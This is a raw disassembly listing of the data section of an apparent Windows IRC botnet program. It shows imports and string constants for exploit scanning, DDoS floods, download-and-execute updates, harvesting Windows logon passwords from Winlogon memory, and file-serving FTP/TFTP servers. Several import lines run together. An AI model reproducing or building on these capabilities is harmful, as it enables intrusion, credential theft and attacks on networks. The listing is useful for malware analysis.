dword_422038 dd 7C80A427h ; resolved to->KERNEL32.QueryPerformanceCounter ; sub_402816+1A7�r ...
dword_42203C dd 7C82FA46h ; resolved to->KERNEL32.QueryPerformanceFrequency ; sub_4125FE+F8�r
dword_422040 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_4034BE+D9�r ...
dword_422044 dd 7C802367h ; resolved to->KERNEL32.CreateProcessA ; sub_402C2F+485�r ...
dword_422048 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_405DD1+21�r ...
dword_42204C dd 7C80EDD7h ; resolved to->KERNEL32.FindClose ; sub_40359E+144�r ...
dword_422050 dd 7C834EB1h ; resolved to->KERNEL32.FindNextFileA ; sub_40359E+139�r ...
dword_422054 dd 7C8137D9h ; resolved to->KERNEL32.FindFirstFileA ; sub_404807+231�r
dword_422058 dd 7C91043Dh ; resolved to->NTDLL.RtlFreeHeap ; sub_403810+F5�r ...
dword_42205C dd 7C9105D4h ; resolved to->NTDLL.RtlAllocateHeap ; sub_403999+4A�r ...
dword_422060 dd 7C80ABC1h ; resolved to->KERNEL32.GetProcessHeap ; sub_403999+40�r ...
dword_422064 dd 7C80E7ECh ; resolved to->KERNEL32.FileTimeToSystemTime ; sub_404807+2AB�r
dword_422068 dd 7C80E866h ; resolved to->KERNEL32.FileTimeToLocalFileTime ; sub_404807+29D�r
dword_42206C dd 7C80B9A0h ; resolved to->KERNEL32.VirtualQueryEx ; sub_403B37+53�r
dword_422070 dd 7C8021CCh ; resolved to->KERNEL32.ReadProcessMemory ; sub_403B37+8D�r
dword_422074 dd 7C812D56h ; resolved to->KERNEL32.GetSystemInfo ; sub_403B37+2C�r ...
dword_422078 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_403B37+10�r ...
dword_42207C dd 7C80ABDEh ; resolved to->KERNEL32.FreeLibrarydword_422080 dd 7C80F0F4h ; resolved to->KERNEL32.GetEnvironmentVariableWdword_422084 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_4061D5+11�r ...
dword_422088 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_4061D5+13A�r ...
dword_42208C dd 7C80180Eh ; resolved to->KERNEL32.ReadFile ; sub_410520+B9�r ...
dword_422090 dd 7C810B8Eh ; resolved to->KERNEL32.SetFilePointer ; .text:00414F9C�r ...
dword_422094 dd 7C810A77h ; resolved to->KERNEL32.GetFileSize ; sub_40528F+1F6�r ...
dword_422098 dd 7C83632Dh ; resolved to->KERNEL32.GetTimeFormatA ; sub_412AEE+185�r
dword_42209C dd 7C8361EEh ; resolved to->KERNEL32.GetDateFormatA ; sub_412AEE+16E�r
dword_4220A0 dd 7C81153Ch ; resolved to->KERNEL32.GetFileAttributesA ; sub_407534+10A�r ...
dword_4220A4 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; sub_407534+F6�r ...
dword_4220A8 dd 7C82F7A0h ; resolved to->KERNEL32.FormatMessageAdword_4220AC dd 7C80FE82h ; resolved to->KERNEL32.GlobalUnlockdword_4220B0 dd 7C80FF19h ; resolved to->KERNEL32.GlobalLockdword_4220B4 dd 7C80B974h ; resolved to->KERNEL32.UnmapViewOfFiledword_4220B8 dd 7C80B905h ; resolved to->KERNEL32.MapViewOfFiledword_4220BC dd 7C80945Ch ; resolved to->KERNEL32.CreateFileMappingAdword_4220C0 dd 7C831CB8h ; resolved to->KERNEL32.SetFileTimedword_4220C4 dd 7C831C45h ; resolved to->KERNEL32.GetFileTimedword_4220C8 dd 7C8329D9h ; resolved to->KERNEL32.ExpandEnvironmentStringsAdword_4220CC dd 7C812782h ; resolved to->KERNEL32.SetFileAttributesA ; sub_408D07+293�r ...
dword_4220D0 dd 7C835DCAh ; resolved to->KERNEL32.GetTempPathA ; sub_409806+32E4�r
dword_4220D4 dd 7C809BF8h ; resolved to->KERNEL32.MultiByteToWideChar ; sub_41411D+61�r ...
dword_4220D8 dd 7C80A0D4h ; resolved to->KERNEL32.WideCharToMultiByte ; .text:00416286�r ...
dword_4220DC dd 7C8216A4h ; resolved to->KERNEL32.GetComputerNameA ; .text:00410E4B�r
dword_4220E0 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcess ; sub_4106AD+7D�r ...
dword_4220E4 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_409806+3F5C�r ...
dword_4220E8 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcess ; sub_408D07+24B�r ...
dword_4220EC dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiAdword_4220F0 dd 7C81CE03h ; resolved to->KERNEL32.TerminateThread ; sub_411CDD+A3�r ...
dword_4220F4 dd 7C835E8Fh ; resolved to->KERNEL32.MoveFileAdword_4220F8 dd 7C809920h ; resolved to->KERNEL32.GetCurrentProcessId ; sub_420497+17�r
dword_4220FC dd 7C8286EEh ; resolved to->KERNEL32.CopyFileA ; sub_415E96+AC�r
dword_422100 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObject ; sub_40FAD0+307�r
dword_422104 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_422108 dd 7C81AE17h ; resolved to->KERNEL32.GetExitCodeProcessdword_42210C dd 7C85F90Fh ; resolved to->KERNEL32.PeekNamedPipe ; sub_410520+101�r
dword_422110 dd 7C80DDFEh ; resolved to->KERNEL32.DuplicateHandle ; sub_411963+6B�r
dword_422114 dd 7C81E0C7h ; resolved to->KERNEL32.CreatePipe ; sub_411BE1+48�r ...
dword_422118 dd 7C81B58Bh ; resolved to->KERNEL32.SetConsoleCtrlHandlerdword_42211C dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoA ; sub_42027F+23�r
dword_422120 dd 7C812ADEh ; resolved to->KERNEL32.GetVersionExA ; sub_4129C0+19�r ...
dword_422124 dd 7C830B14h ; resolved to->KERNEL32.GetLogicalDrivesdword_422128 dd 7C873A31h ; resolved to->KERNEL32.GenerateConsoleCtrlEventdword_42212C dd 7C80A05Dh ; resolved to->KERNEL32.WaitForMultipleObjectsdword_422130 dd 7C8310F2h ; resolved to->KERNEL32.GlobalMemoryStatusdword_422134 dd 7C8312E5h ; resolved to->KERNEL32.TransactNamedPipedword_422138 dd 7C832044h ; resolved to->KERNEL32.SetEndOfFiledword_42213C dd 7C9109EDh ; resolved to->NTDLL.RtlSizeHeapdword_422140 dd 7C80BCCFh ; resolved to->KERNEL32.IsBadCodePtrdword_422144 dd 7C809E01h ; resolved to->KERNEL32.IsBadReadPtrdword_422148 dd 7C84467Dh ; resolved to->KERNEL32.SetUnhandledExceptionFilter ; sub_420690+6�r
dword_42214C dd 7C812641h ; resolved to->KERNEL32.FlushFileBuffersdword_422150 dd 7C81DC03h ; resolved to->KERNEL32.SetStdHandle ; sub_41F48C:loc_41F4E2�r
dword_422154 dd 7C809EF1h ; resolved to->KERNEL32.InitializeCriticalSectiondword_422158 dd 7C80A490h ; resolved to->KERNEL32.GetStringTypeW ; sub_41E8E0+128�r ...
dword_42215C dd 7C9179FDh ; resolved to->NTDLL.RtlReAllocateHeap ; sub_416F93+188�r ...
dword_422160 dd 7C8017E5h ; resolved to->KERNEL32.GetSystemTimeAsFileTime ; sub_420497+B�r
dword_422164 dd 7C937A40h ; resolved to->NTDLL.RtlUnwinddword_422168 dd 7C801EEEh ; resolved to->KERNEL32.GetStartupInfoA ; sub_41E06B+5D�r
dword_42216C dd 7C812F1Dh ; resolved to->KERNEL32.GetCommandLineAdword_422170 dd 7C8136D7h ; resolved to->KERNEL32.TlsFreedword_422174 dd 7C910340h ; resolved to->NTDLL.RtlSetLastWin32Error ; sub_41EF60+79�r
dword_422178 dd 7C809728h ; resolved to->KERNEL32.GetCurrentThreadId ; sub_4191D0+55�r ...
dword_42217C dd 7C809BC5h ; resolved to->KERNEL32.TlsSetValue ; sub_4191D0+3D�r
dword_422180 dd 7C809740h ; resolved to->KERNEL32.TlsGetValuedword_422184 dd 7C812D9Fh ; resolved to->KERNEL32.TlsAllocdword_422188 dd 7C810EF8h ; resolved to->KERNEL32.HeapDestroydword_42218C dd 7C812BB6h ; resolved to->KERNEL32.HeapCreatedword_422190 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_422194 dd 7C809A51h ; resolved to->KERNEL32.VirtualAlloc ; sub_41A5D9+52�r ...
dword_422198 dd 7C809E79h ; resolved to->KERNEL32.IsBadWritePtrdword_42219C dd 7C801AD0h ; resolved to->KERNEL32.VirtualProtectdword_4221A0 dd 7C80B9D1h ; resolved to->KERNEL32.VirtualQuery ; sub_41C068+71�r
dword_4221A4 dd 7C838DE8h ; resolved to->KERNEL32.LCMapStringA ; sub_41C139+344�r ...
dword_4221A8 dd 7C80CCA8h ; resolved to->KERNEL32.LCMapStringW ; sub_41C139+15B�r ...
dword_4221AC dd 7C809915h ; resolved to->KERNEL32.GetACPdword_4221B0 dd 7C8127A7h ; resolved to->KERNEL32.GetOEMCPdword_4221B4 dd 7C812E76h ; resolved to->KERNEL32.GetCPInfo ; sub_41D165+3D�r ...
dword_4221B8 dd 7C812F39h ; resolved to->KERNEL32.GetStdHandle ; sub_41E06B+188�r
dword_4221BC dd 7C862E2Ah ; resolved to->KERNEL32.UnhandledExceptionFilterdword_4221C0 dd 7C81DF77h ; resolved to->KERNEL32.FreeEnvironmentStringsAdword_4221C4 dd 7C81CF5Bh ; resolved to->KERNEL32.GetEnvironmentStringsAdword_4221C8 dd 7C814AE7h ; resolved to->KERNEL32.FreeEnvironmentStringsWdword_4221CC dd 7C812F08h ; resolved to->KERNEL32.GetEnvironmentStringsWdword_4221D0 dd 7C80CC97h ; resolved to->KERNEL32.SetHandleCountdword_4221D4 dd 7C810E51h ; resolved to->KERNEL32.GetFileType ; sub_41E06B+196�r ...
dword_4221D8 dd 7C838A0Ch ; resolved to->KERNEL32.GetStringTypeA ; sub_421C8A+1CD�r
align 10h
dword_4221E0 dd 0 dword_4221E4 dd 0 dword_4221E8 dd 0 dword_4221EC dd 0 dword_4221F0 dd 0 ; sub_404260+58B�r
dword_4221F4 dd 0 dword_4221F8 dd 0 dword_4221FC dd 0 dword_422200 dd 0 ; sub_404260+119�r
dword_422204 dd 0 ; sub_404260+49�r
dword_422208 dd 0 ; sub_404260+6F�r
dword_42220C dd 0 dword_422210 dd 0 ; sub_404260+B0�r
dword_422214 dd 0 dword_422218 dd 0 ; sub_4041CE+80�r ...
dword_42221C dd 0 ; sub_4041CE+86�r
dd 2 dup(0)
aTotalDInS_ db ' Total: %d in %s.',0 ; DATA XREF: start+81�o
align 4
aSD db ' %s: %d,',0 ; DATA XREF: start+42�o
align 4
aScanExploitSta db '[SCAN]: Exploit Statistics:',0 ; DATA XREF: start+11�o
aScanScanNotAct db '[SCAN]: Scan not active.',0 ; DATA XREF: sub_4010CA+42�o
align 10h
aScanCurrentIpS db '[SCAN]: Current IP: %s.',0 ; DATA XREF: sub_4010CA+2C�o
aHttpdFailedToS db '[HTTPD]: Failed to start server, error: <%d>.',0
; DATA XREF: sub_401141+376�o
align 4
aHttpdServerLis db '[HTTPD]: Server listening on IP: %s:%d, Directory: %s\.',0
; DATA XREF: sub_401141+320�o
; sub_409806+49E0�o
aFtpFailedToSta db '[FTP]: Failed to start server, error: <%d>.',0
; DATA XREF: sub_401141+26B�o
aFtpServerStart db '[FTP]: Server started on Port: %d, File: %s, Request: %s.',0
; DATA XREF: sub_401141+214�o
align 4
aTftpFailedToSt db '[TFTP]: Failed to start server, error: <%d>.',0
; DATA XREF: sub_401141+138�o
align 4
aTftpServerStar db '[TFTP]: Server started on Port: %d, File: %s, Request: %s.',0
; DATA XREF: sub_401141+D8�o
; sub_409806+4850�o
align 4
aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: sub_4017DA+42�o
; sub_408852+3D�o
aScanIpSPortDIs db '[SCAN]: IP: %s, Port %d is open.',0 ; DATA XREF: sub_401950+DC�o
align 4
aScanIpSDScanTh db '[SCAN]: IP: %s:%d, Scan thread: %d, Sub-thread: %d.',0
; DATA XREF: sub_401950+84�o
aScanFinishedAt db '[SCAN]: Finished at %s:%d after %d minute(s) of scanning.',0
; DATA XREF: sub_401B65+1E0�o
align 4
aScanFailedToSt db '[SCAN]: Failed to start worker thread, error: <%d>.',0
; DATA XREF: sub_401B65+168�o
aScanSDScanThre db '[SCAN]: %s:%d, Scan thread: %d, Sub-thread: %d.',0
; DATA XREF: sub_401B65+103�o
aScanFailedToIn db '[SCAN]: Failed to initialize critical section.',0
; DATA XREF: sub_401B65+87�o
align 4
aD_SS db '%d. %s = %s',0 ; DATA XREF: sub_401E55+35�o
aAliasList db '-[Alias List]-',0 ; DATA XREF: sub_401E55+10�o
align 4
a_2d_2d4d_2d_2d db '[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s',0 ; DATA XREF: sub_401ECD+60�o
align 4
aLogsCleared_ db '[LOGS]: Cleared.',0 ; DATA XREF: sub_401F6D+1A�o
align 4
aLogListComplet db '[LOG]: List complete.',0 ; DATA XREF: sub_401FDF+DC�o
align 4
aLogBegin db '[LOG]: Begin',0 ; DATA XREF: sub_401FDF+3F�o
align 4
aDisplay db 'DISPLAY',0 ; DATA XREF: sub_402183+12�o
aWindow db 'Window',0 ; DATA XREF: sub_4023C0+23�o
; sub_4025BC+26�o
align 4
dd 2 dup(0)
dd 77073096h, 0EE0E612Ch, 990951BAh, 76DC419h, 706AF48Fh
dd 0E963A535h, 9E6495A3h, 0EDB8832h, 79DCB8A4h, 0E0D5E91Eh
dd 97D2D988h, 9B64C2Bh, 7EB17CBDh, 0E7B82D07h, 90BF1D91h
dd 1DB71064h, 6AB020F2h, 0F3B97148h, 84BE41DEh, 1ADAD47Dh
dd 6DDDE4EBh, 0F4D4B551h, 83D385C7h, 136C9856h, 646BA8C0h
dd 0FD62F97Ah, 8A65C9ECh, 14015C4Fh, 63066CD9h, 0FA0F3D63h
dd 8D080DF5h, 3B6E20C8h, 4C69105Eh, 0D56041E4h, 0A2677172h
dd 3C03E4D1h, 4B04D447h, 0D20D85FDh, 0A50AB56Bh, 35B5A8FAh
dd 42B2986Ch, 0DBBBC9D6h, 0ACBCF940h, 32D86CE3h, 45DF5C75h
dd 0DCD60DCFh, 0ABD13D59h, 26D930ACh, 51DE003Ah, 0C8D75180h
dd 0BFD06116h, 21B4F4B5h, 56B3C423h, 0CFBA9599h, 0B8BDA50Fh
dd 2802B89Eh, 5F058808h, 0C60CD9B2h, 0B10BE924h, 2F6F7C87h
dd 58684C11h, 0C1611DABh, 0B6662D3Dh, 76DC4190h, 1DB7106h
dd 98D220BCh, 0EFD5102Ah, 71B18589h, 6B6B51Fh, 9FBFE4A5h
dd 0E8B8D433h, 7807C9A2h, 0F00F934h, 9609A88Eh, 0E10E9818h
dd 7F6A0DBBh, 86D3D2Dh, 91646C97h, 0E6635C01h, 6B6B51F4h
dd 1C6C6162h, 856530D8h, 0F262004Eh, 6C0695EDh, 1B01A57Bh
dd 8208F4C1h, 0F50FC457h, 65B0D9C6h, 12B7E950h, 8BBEB8EAh
dd 0FCB9887Ch, 62DD1DDFh, 15DA2D49h, 8CD37CF3h, 0FBD44C65h
dd 4DB26158h, 3AB551CEh, 0A3BC0074h, 0D4BB30E2h, 4ADFA541h
dd 3DD895D7h, 0A4D1C46Dh, 0D3D6F4FBh, 4369E96Ah, 346ED9FCh
dd 0AD678846h, 0DA60B8D0h, 44042D73h, 33031DE5h, 0AA0A4C5Fh
dd 0DD0D7CC9h, 5005713Ch, 270241AAh, 0BE0B1010h, 0C90C2086h
dd 5768B525h, 206F85B3h, 0B966D409h, 0CE61E49Fh, 5EDEF90Eh
dd 29D9C998h, 0B0D09822h, 0C7D7A8B4h, 59B33D17h, 2EB40D81h
dd 0B7BD5C3Bh, 0C0BA6CADh, 0EDB88320h, 9ABFB3B6h, 3B6E20Ch
dd 74B1D29Ah, 0EAD54739h, 9DD277AFh, 4DB2615h, 73DC1683h
dd 0E3630B12h, 94643B84h, 0D6D6A3Eh, 7A6A5AA8h, 0E40ECF0Bh
dd 9309FF9Dh, 0A00AE27h, 7D079EB1h, 0F00F9344h, 8708A3D2h
dd 1E01F268h, 6906C2FEh, 0F762575Dh, 806567CBh, 196C3671h
dd 6E6B06E7h, 0FED41B76h, 89D32BE0h, 10DA7A5Ah, 67DD4ACCh
dd 0F9B9DF6Fh, 8EBEEFF9h, 17B7BE43h, 60B08ED5h, 0D6D6A3E8h
dd 0A1D1937Eh, 38D8C2C4h, 4FDFF252h, 0D1BB67F1h, 0A6BC5767h
dd 3FB506DDh, 48B2364Bh, 0D80D2BDAh, 0AF0A1B4Ch, 36034AF6h
dd 41047A60h, 0DF60EFC3h, 0A867DF55h, 316E8EEFh, 4669BE79h
dd 0CB61B38Ch, 0BC66831Ah, 256FD2A0h, 5268E236h, 0CC0C7795h
dd 0BB0B4703h, 220216B9h, 5505262Fh, 0C5BA3BBEh, 0B2BD0B28h
dd 2BB45A92h, 5CB36A04h, 0C2D7FFA7h, 0B5D0CF31h, 2CD99E8Bh
dd 5BDEAE1Dh, 9B64C2B0h, 0EC63F226h, 756AA39Ch, 26D930Ah
dd 9C0906A9h, 0EB0E363Fh, 72076785h, 5005713h, 95BF4A82h
dd 0E2B87A14h, 7BB12BAEh, 0CB61B38h, 92D28E9Bh, 0E5D5BE0Dh
dd 7CDCEFB7h, 0BDBDF21h, 86D3D2D4h, 0F1D4E242h, 68DDB3F8h
dd 1FDA836Eh, 81BE16CDh, 0F6B9265Bh, 6FB077E1h, 18B74777h
dd 88085AE6h, 0FF0F6A70h, 66063BCAh, 11010B5Ch, 8F659EFFh
dd 0F862AE69h, 616BFFD3h, 166CCF45h, 0A00AE278h, 0D70DD2EEh
dd 4E048354h, 3903B3C2h, 0A7672661h, 0D06016F7h, 4969474Dh
dd 3E6E77DBh, 0AED16A4Ah, 0D9D65ADCh, 40DF0B66h, 37D83BF0h
dd 0A9BCAE53h, 0DEBB9EC5h, 47B2CF7Fh, 30B5FFE9h, 0BDBDF21Ch
dd 0CABAC28Ah, 53B39330h, 24B4A3A6h, 0BAD03605h, 0CDD70693h
dd 54DE5729h, 23D967BFh, 0B3667A2Eh, 0C4614AB8h, 5D681B02h
dd 2A6F2B94h, 0B40BBE37h, 0C30C8EA1h, 5A05DF1Bh, 2D02EF8Dh
dword_422998 dd 6272h ; sub_4131EE+121�o ...
aDdosSendErrorD db '[DDoS]: Send error: <%d>.',0 ; DATA XREF: sub_402816+2B7�o
align 4
aDdos_random db 'ddos.random',0 ; DATA XREF: sub_402816+122�o
; sub_409806+25A8�o
aDdos_ack db 'ddos.ack',0 ; DATA XREF: sub_402816+108�o
; sub_409806+2594�o
align 10h
aDdos_syn db 'ddos.syn',0 ; DATA XREF: sub_402816+EE�o
; sub_409806+2580�o
align 4
aDdosDoneWithFl db '[DDoS]: Done with flood (%iKB/sec).',0 ; DATA XREF: sub_402B61+5B�o
aDownloadBadUrl db '[DOWNLOAD]: Bad URL, or DNS Error: %s.',0 ; DATA XREF: sub_402C2F+4B6�o
align 4
aDownloadUpda_0 db '[DOWNLOAD]: Update failed: Error executing file: %s.',0
; DATA XREF: sub_402C2F+4A8�o
align 10h
aDownloadDown_0 db '[DOWNLOAD]: Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.',0
; DATA XREF: sub_402C2F+403�o
aDownloadExecut db '[DOWNLOAD]: Execution failed: Error executing file: %s.',0
; DATA XREF: sub_402C2F:loc_402FE5�o
aDownloadApplic db '[DOWNLOAD]: Application succesfully executed: %s.',0
; DATA XREF: sub_402C2F+3AC�o
align 4
asc_422B08: ; DATA XREF: sub_402C2F+346�o
; sub_405549+25C�o ...
unicode 0, < >,0
aDownloadOpenni db '[DOWNLOAD]: Openning: %s %s.',0 ; DATA XREF: sub_402C2F+2B4�o
align 4
aDownloadDownlo db '[DOWNLOAD]: Downloaded %.1f KB to %s @ %.1f KB/sec.',0
; DATA XREF: sub_402C2F+24E�o
dbl_422B60 dq 9.765625e-4 ; DATA XREF: sub_402C2F+21D�r
; sub_402C2F:loc_402E6C�r ...
dbl_422B68 dq 4.294967296e9 ; DATA XREF: sub_402C2F+215�r
; sub_402C2F+237�r ...
aDownloadFilesi db '[DOWNLOAD]: Filesize is incorrect: (%d != %d).',0
; DATA XREF: sub_402C2F+195�o
align 10h
aDownloadUpdate db '[DOWNLOAD]: Update: %s (%dKB transferred).',0
; DATA XREF: sub_402C2F:loc_402D92�o
align 4
aDownloadFileDo db '[DOWNLOAD]: File download: %s (%dKB transferred).',0
; DATA XREF: sub_402C2F+15C�o
align 10h
aDownloadCouldn db '[DOWNLOAD]: Couldn',27h,'t open file: %s.',0 ; DATA XREF: sub_402C2F+77�o
aUnknown db 'Unknown',0 ; DATA XREF: sub_4031D5:loc_403218�o
; sub_407CEF+104�o
aInvalid db 'Invalid',0 ; DATA XREF: sub_4031D5:loc_403212�o
aDisk db 'Disk',0 ; DATA XREF: sub_4031D5:loc_40320C�o
align 4
aNetwork db 'Network',0 ; DATA XREF: sub_4031D5:loc_403206�o
aCdrom db 'Cdrom',0 ; DATA XREF: sub_4031D5:loc_403200�o
align 4
aRam db 'RAM',0 ; DATA XREF: sub_4031D5:loc_4031FA�o
a?: ; DATA XREF: sub_4031D5+1F�o
unicode 0, <?>,0
aFailed db 'failed',0 ; DATA XREF: sub_403266:loc_40333E�o
; sub_403381+2D�o
align 4
aSkb db '%sKB',0 ; DATA XREF: sub_403266+6C�o
align 4
aMainSDriveSSTo db '[MAIN]: %s Drive (%s): %s total, %s free, %s available.',0
; DATA XREF: sub_403381+7B�o
aMainSDriveSFai db '[MAIN]: %s Drive (%s): Failed to stat, device not ready.',0
; DATA XREF: sub_403381+45�o
align 4
aA db 'A:\',0 ; DATA XREF: sub_403440+39�o
aFoundSS db ' Found: %s\%s',0 ; DATA XREF: sub_40359E+107�o
align 4
aSS_0 db '%s\%s',0 ; DATA XREF: sub_40359E+45�o
; sub_40FAD0+195�o
align 4
aS_2 db '%s\*',0 ; DATA XREF: sub_40359E+14�o
align 4
aFindfileFilesF db '[FINDFILE]: Files found: %d.',0 ; DATA XREF: sub_4036F0+CF�o
align 4
aFindfileSearch db '[FINDFILE]: Searching for file: %s.',0 ; DATA XREF: sub_4036F0+66�o
aMsgina db 'MSGINA',0 ; DATA XREF: sub_403810+13E�o
align 4
aNwgina db 'NWGINA',0 ; DATA XREF: sub_403810+123�o
align 10h
aWinlogon db 'WINLOGON',0 ; DATA XREF: sub_403810+B9�o
align 10h
aFindpassTheWin db '[FINDPASS]: The Windows logon (Pid: <%d>) information is: Domain:'
; DATA XREF: sub_403C5C+6A�o
; sub_403CEE+A3�o
db ' \\%S, User: (%S/%S).',0
align 4
aFindpassTheW_0 db '[FINDPASS]: The Windows logon (Pid: <%d>) information is: Domain:'
; DATA XREF: sub_403CEE+C5�o
db ' \\%S, User: (%S/(N/A)).',0
align 4
aFindpassFailed db '[FINDPASS]: Failed to enable Debug Privilege.',0
; DATA XREF: sub_403DEF:loc_403F66�o
align 4
aFindpassUnab_0 db '[FINDPASS]: Unable to find Winlogon Process ID.',0
; DATA XREF: sub_403DEF:loc_403F3A�o
aFindpassUnable db '[FINDPASS]: Unable to find the password in memory.',0
; DATA XREF: sub_403DEF:loc_403F33�o
align 4
aFindpassTheW_1 db '[FINDPASS]: The Windows logon (Pid: <%d>) information is: Domain:'
; DATA XREF: sub_403DEF+116�o
db ' \\%S, User: (%S/(no password)).',0
align 4
aUserdomain: ; DATA XREF: sub_403DEF+DB�o
unicode 0, <USERDOMAIN>,0
align 4
aUsername: ; DATA XREF: sub_403DEF+CD�o
unicode 0, <USERNAME>,0
align 4
aRtlrundecodeun db 'RtlRunDecodeUnicodeString',0 ; DATA XREF: sub_403DEF+99�o
align 4
aRtldestroyquer db 'RtlDestroyQueryDebugBuffer',0 ; DATA XREF: sub_403DEF+8C�o
align 10h
aRtlqueryproces db 'RtlQueryProcessDebugInformation',0 ; DATA XREF: sub_403DEF+7F�o
aRtlcreatequery db 'RtlCreateQueryDebugBuffer',0 ; DATA XREF: sub_403DEF+72�o
align 4
aNtquerysystemi db 'NtQuerySystemInformation',0 ; DATA XREF: sub_403DEF+67�o
align 4
aNtdll_dll db 'NTDLL.DLL',0 ; DATA XREF: sub_403DEF+54�o
align 4
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_403DEF+40�o
; sub_403DEF+160�o ...
align 4
aFindpassOnlySu db '[FINDPASS]: Only supported on Windows NT/2000.',0
; DATA XREF: sub_403DEF+35�o
align 4
a221Goodbye_ db '221 Goodbye.',0Ah,0 ; DATA XREF: sub_404260+542�o
align 4
aQuit db 'QUIT',0 ; DATA XREF: sub_404260+531�o
; sub_409806+5DA�o
align 10h
a425CanTOpenDat db '425 Can',27h,'t open data connection.',0Ah,0
; DATA XREF: sub_404260+528�o
align 4
aFtpFileTransfe db '[FTP]: File transfer complete to IP: %s (%s).',0
; DATA XREF: sub_404260+4DC�o
align 4
a226TransferC_0 db '226 Transfer complete.',0Ah,0 ; DATA XREF: sub_404260+4C1�o
a150OpeningBina db '150 Opening BINARY mode data connection',0Ah,0
; DATA XREF: sub_404260+491�o
align 4
aRetr db 'RETR',0 ; DATA XREF: sub_404260:loc_4046DA�o
align 10h
a200PortCommand db '200 PORT command successful.',0Ah,0 ; DATA XREF: sub_404260+470�o
align 10h
aS_S_S_S db '%s.%s.%s.%s',0 ; DATA XREF: sub_404260+45E�o
aXX db '%x%x',0Ah,0 ; DATA XREF: sub_404260+42A�o
align 4
aS db '%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^',0Ah ; DATA XREF: sub_404260+3EC�o
db ']',0
aPort db 'PORT',0 ; DATA XREF: sub_404260:loc_404616�o
align 4
a226TransferCom db '226 Transfer complete',0Ah,0 ; DATA XREF: sub_404260+38E�o
align 4
aList db 'LIST',0 ; DATA XREF: sub_404260:loc_4045DC�o
align 4
a425PassiveNotS db '425 Passive not supported on this server',0Ah,0
; DATA XREF: sub_404260+350�o
align 10h
aPasv db 'PASV',0 ; DATA XREF: sub_404260:loc_40459D�o
align 4
a200TypeSetToI_ db '200 Type set to I.',0Ah,0 ; DATA XREF: sub_404260+333�o
aI: ; DATA XREF: sub_404260+31E�o
unicode 0, <I>,0
a200TypeSetToA_ db '200 Type set to A.',0Ah,0 ; DATA XREF: sub_404260+302�o
aA_0: ; DATA XREF: sub_404260+2ED�o
unicode 0, <A>,0
aType db 'TYPE',0 ; DATA XREF: sub_404260:loc_404539�o
align 10h
a257IsCurrentDi db '257 "/" is current directory.',0Ah,0 ; DATA XREF: sub_404260+2CF�o
align 10h
off_4231E0 dd offset dword_445750 ; DATA XREF: sub_404260+2BD�o
a350Restarting_ db '350 Restarting.',0Ah,0 ; DATA XREF: sub_404260+2B1�o
align 4
aRest db 'REST',0 ; DATA XREF: sub_404260:loc_4044FE�o
align 10h
a215Stnyftpd db '215 StnyFtpd',0Ah,0 ; DATA XREF: sub_404260+294�o
align 10h
aSyst db 'SYST',0 ; DATA XREF: sub_404260:loc_4044E1�o
align 4
a230UserLoggedI db '230 User logged in.',0Ah,0 ; DATA XREF: sub_404260+277�o
align 10h
aPass db 'PASS',0 ; DATA XREF: sub_404260:loc_4044C4�o
align 4
a331PasswordReq db '331 Password required',0Ah,0 ; DATA XREF: sub_404260+25A�o
align 10h
aUser_0 db 'USER',0 ; DATA XREF: sub_404260+247�o
align 4
aSS_1 db '%s %s',0 ; DATA XREF: sub_404260+236�o
align 10h
a220Winftpd1_2 db '220 WinFtpd 1.2',0Ah,0 ; DATA XREF: sub_404260+1BA�o
align 4
aFoundIFilesAnd db 'Found: %i Files and %i Directories',0Dh,0Ah,0
; DATA XREF: sub_404807+6BB�o
align 10h
aTrTdColspan3_0 db '<TR>',0Dh,0Ah ; DATA XREF: sub_404807+6A6�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah
db '</TABLE>',0Dh,0Ah
db '</BODY>',0Dh,0Ah
db '</HTML>',0Dh,0Ah,0
align 4
aPrivmsgSFoundS db 'PRIVMSG %s :Found %s Files and %s Directories',0Ah,0
; DATA XREF: sub_404807+68B�o
align 4
a31s21sIBytes db '%-31s %-21s (%i bytes)',0Dh,0Ah,0 ; DATA XREF: sub_404807+5F1�o
align 8
aTdTdWidthDCo_0 db '</TD>',0Dh,0Ah ; DATA XREF: sub_404807+5C9�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>%dk</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
aCodeSCodeA_0 db '"><CODE>%s</CODE></A>',0 ; DATA XREF: sub_404807:loc_404D88�o
align 4
aCode_30sGtCode db '"><CODE>%.30s></CODE></A>',0 ; DATA XREF: sub_404807+57A�o
align 4
aSS db '%s%s',0 ; DATA XREF: sub_404807+523�o
; sub_40528F+E6�o ...
align 10h
aPrivmsgS31s2_0 db 'PRIVMSG %s :%-31s %-21s (%s bytes)',0Ah,0 ; DATA XREF: sub_404807+4C5�o
align 4
a31s21s db '%-31s %-21s',0Dh,0Ah,0 ; DATA XREF: sub_404807+484�o
align 4
aTdTdWidthDCode db '</TD>',0Dh,0Ah ; DATA XREF: sub_404807+451�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>-</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 10h
aCodeSCodeA db '"><CODE>%s/</CODE></A>',0 ; DATA XREF: sub_404807:loc_404C1A�o
align 4
